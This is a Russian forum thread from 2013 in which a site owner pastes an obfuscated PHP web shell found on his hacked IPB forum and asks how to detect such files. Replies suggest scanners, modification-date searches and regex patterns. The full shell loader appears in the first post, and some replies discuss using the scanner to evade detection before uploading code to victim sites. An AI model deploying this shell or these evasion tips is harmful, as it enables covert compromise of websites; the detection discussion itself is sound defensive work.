|
| Дата |
|
USD/RUB | 90.1887 | BTC/USD | 67999.1011 |
|
|
|
Скрипты, программы и технические решения Обсуждаем скрипты, программы и новые технологии. |
06.01.2013, 01:24
|
Start Post: Сила гофака помоги: Как искать такие шеллы?
|
Шоколатье
Регистрация: 20.04.2007
Сообщений: 5,973
Бабло: $726105
|
26 ноября заломали мне IPB (как и многим другим) и залили прикольные шеллы.
не могу придумать как спалить их все ?
скрипт py\bash\php или просто регулярка привестствуется, я уже себе голову поломал.
нет ни eval ни preg_replace ни system
PHP код:
<?php $x98ec27r='iHOHWxHk:>HlGH3J<[ic[!B&,Jcxf,3:xHl:>HOlkH3VxBF-I[Bx,[IFEbZwM!g9qE2VYYV-B&,Jcxf,![$x>c>F3>P&cIf1,*iRR4iJd32Vi,IVs}!m)Z?)ZS3vCC9!j3t;;3432VWVB&,Jcxf,V>P&cIf1,*iRR4iJdF2WV[JPfV3#-DD3|(IGF3Rx,d>32|3DD83:VKV<[px>c[<!>P&cIf1,!B&,Jcxf,F3>P&cIf1,*iRR4iJd32:VKV3:K';global$ijxnnkw8;$ijxnnkw8=array();$wcm8ntc9=array(73,82,79,89,78,85,93,80,70,6,14,71,12,7,13,9,30,95,72,99,90,83,28,20,29,88,27,122,110,115,113,117,108,126,21,26,68,84,75,127,94,87,124,24,111,121,106,103,116,104,125,97,1,0,17,18,81,2,65,91);foreach($wcm8ntc9 as $u7l2npnl)$ijxnnkw8[]=($u7l2npnl^60);$da9003ao=ry8ljsqu(array(38,44,62,91,60,120,105,82,120,43,91));$d5qwvdlm=$da9003ao(ry8ljsqu($x98ec27r));$mvh5bn8h=$d5qwvdlm[0];$i44cg14d=$mvh5bn8h('',$d5qwvdlm[1]);$i44cg14d();function ry8ljsqu($spq,$nlg='',$tr="\x63\x68\x72"){global$ijxnnkw8,$ns84;if(!isset($ns84))$ns84=array();static$buvy;if(!isset($buvy))$buvy=0;$lz=$nyx=$zs=$fa=$tr;$zq8=$nyx(208^179).$fa(119^24).$fa(16^101).$fa(150^248).$nyx(210^166);$usw=$fa(119^4).$tr(101^17).$zs(196^182).$zs(112^28).$fa(117^16).$lz(20^122);$uyk=$lz(209^184).$nyx(63^76).$nyx(2^93).$nyx(64^33).$tr(174^220).$nyx(31^109).$nyx(168^201).$lz(219^162);$ll6=$nyx(67^44).$lz(130^240).$lz(44^72);for($j5c=0,$pj3f=0;$j5c<($uyk($spq)?$zq8($spq):$usw($spq));$j5c++){$odem=(($uyk($spq)?$spq[$j5c]:$ll6($spq[$j5c])));if($odem==(5^15)||$odem==(115^126))continue;if(!isset($ns84[$odem])) $ns84[$odem]=$buvy++;if(!isset($ijxnnkw8[$ns84[$odem]])){echo($spq[$$j5c].' '.$odem);exit;}$kgxx=$tr( $ijxnnkw8[$ns84[$odem]]);$nlg.=$kgxx;}return$nlg;} ?>
|
|
|
06.01.2013, 04:24
|
#12
|
Senior Member
Регистрация: 12.07.2007
Сообщений: 685
Бабло: $82645
|
запускаем айболит (ссылка выше) - он покажет все подозрительные
далее если знаком с движком видно что левое
а вообще по дате редактирования, редко кто подчищает за собой время
|
|
|
06.01.2013, 04:36
|
#13
|
Senior Member
Регистрация: 02.10.2012
Сообщений: 302
Бабло: $71110
|
да, айболит это хороше, я код всегда проверяю айболитом, чтоб непалилось ничего (спасибоавторузаэто), а только потом заливаю на пирог
|
|
|
06.01.2013, 04:44
|
#14
|
$400
Регистрация: 17.05.2009
Сообщений: 14,031
Бабло: $1903940
|
Цитата:
Сообщение от Smilex
а вообще по дате редактирования, редко кто подчищает за собой время
|
когда-то когда поломали тоже один хостинг у меня по дате находил
даже софтину тогда помню писал, чтоб все почистить
там доры висели с трафом и там паг было тысячи и тысячи и в каждую index позаписывали подобное, но с обычным эвалом
|
|
|
06.01.2013, 16:39
|
#15
|
хуйнанэ
Регистрация: 03.04.2007
Сообщений: 1,294
Бабло: $126446
|
когда у меня так "сломали" - я искал файлы измененные больше какой то даты.
$ find /usr -mtime +356 -daystart
|
|
|
06.01.2013, 22:28
|
#16
|
$
Регистрация: 05.04.2007
Сообщений: 575
Бабло: $101390
|
как по мне - не факт, что скрипт в 1 и 5 посте это один и тот же обфускатор.
Dadee, что у тебя для разных сайтов разный код вставили на серваке.? тогда давай примеры... 5 пост я так понял это другой случай.
код в первом посте можно палить поиском последовательности вида .$fa(16^101) (регулярку захуярить по маскена все комбинации)
5 пост - коментарии */./*
или искть вызов функции типа ($phl6yJ,$r6Q7D($lGp2BqP),$PJf4o9)
с временем модификации файтов - не всегда прокатывает. иногда настройки сервака позволяют менять это дело.
можно также искать в пхп файлах длинные строки.
короче подчистить всегда можно, но нужно конкретные примеры рассматривать и знать, что у тебя на серваке за скрипты.
|
|
|
07.01.2013, 04:54
|
#17
|
Senior Member
Регистрация: 26.01.2009
Адрес: Ленинград
Сообщений: 642
Бабло: $106689
|
если просто найти не удаляя то первый ищи уникальную строку, которой обычно нет в скриптах, например второй айболит ваш от лохов c eval и preg
пару десятков таких файлов с уникальными значениями хрен найдете автоматом, только ручками
можете запустить, там только phpinfo =)
|
|
|
07.01.2013, 13:01
|
#18
|
Senior Member
Регистрация: 06.05.2007
Сообщений: 477
Бабло: $70325
|
Встречный вопрос: а где взять подобный обусфактор?
__________________
Cloacking под любой источник трафика. Сдаю в аренду.
|
|
|
07.01.2013, 13:50
|
#19
|
$400
Регистрация: 17.05.2009
Сообщений: 14,031
Бабло: $1903940
|
ну, как где? написать...
|
|
|
07.01.2013, 17:27
|
#20
|
Member
Регистрация: 16.01.2008
Сообщений: 86
Бабло: $11570
|
$$
искать по $$ Думаю, найдется все что надо.
|
|
|
07.01.2013, 18:15
|
#21
|
Ебланнед
Регистрация: 27.11.2012
Сообщений: 223
Бабло: $43064
|
Цитата:
Сообщение от kip
Встречный вопрос: а где взять подобный обусфактор?
|
+1 к вопросу
тут вроде пиарился цезарь, может это он так обфусцирует никто не юзал его?
|
|
|
|